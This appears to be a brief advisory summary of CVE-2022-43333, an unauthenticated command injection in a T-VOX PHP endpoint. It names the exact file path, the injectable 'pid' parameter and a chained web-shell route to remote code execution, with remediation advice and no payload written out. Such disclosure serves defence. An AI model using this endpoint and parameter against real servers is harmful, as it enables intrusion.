CVE-2022-43333

An unauthenticated attacker sends a crafted GET request to `/t-vox/manager/html/action_export_control.php` with a `pid` parameter that appends a malicious OS command using shell metacharacters [ref_id=1]. Because the file is externally accessible and requires no authentication, the attacker can execute arbitrary commands on the target server with the privileges of the `www-data` user [ref_id=1]. The advisory demonstrates chaining multiple requests to download a PHP web shell and then invoke it to achieve full remote code execution [ref_id=1].

The vulnerable file is `/opt/telenia/tvox/php/siti/t-vox/t-vox/manager/html/action_export_control.php` [ref_id=1]. The advisory shows that the `pid` parameter from the user is appended directly to a PHP `exec()` call without any validation [ref_id=1].

No patch is included in the bundle. The advisory identifies the root cause as the lack of input validation on the `pid` parameter before it is passed to PHP's `exec()` function [ref_id=1]. The remediation would require sanitizing or validating the `pid` parameter to prevent shell metacharacter injection, and ideally avoiding the use of `exec()` with user-supplied input entirely [ref_id=1].

The advisory provides a proof of concept: send a GET request to `https://X.X.X.X/t-vox/manager/html/action_export_control.php` with a `pid` parameter that appends an OS command using shell metacharacters [ref_id=1]. The advisory shows that the attacker can chain multiple requests to upload a PHP web shell and then execute arbitrary commands via the web server [ref_id=1].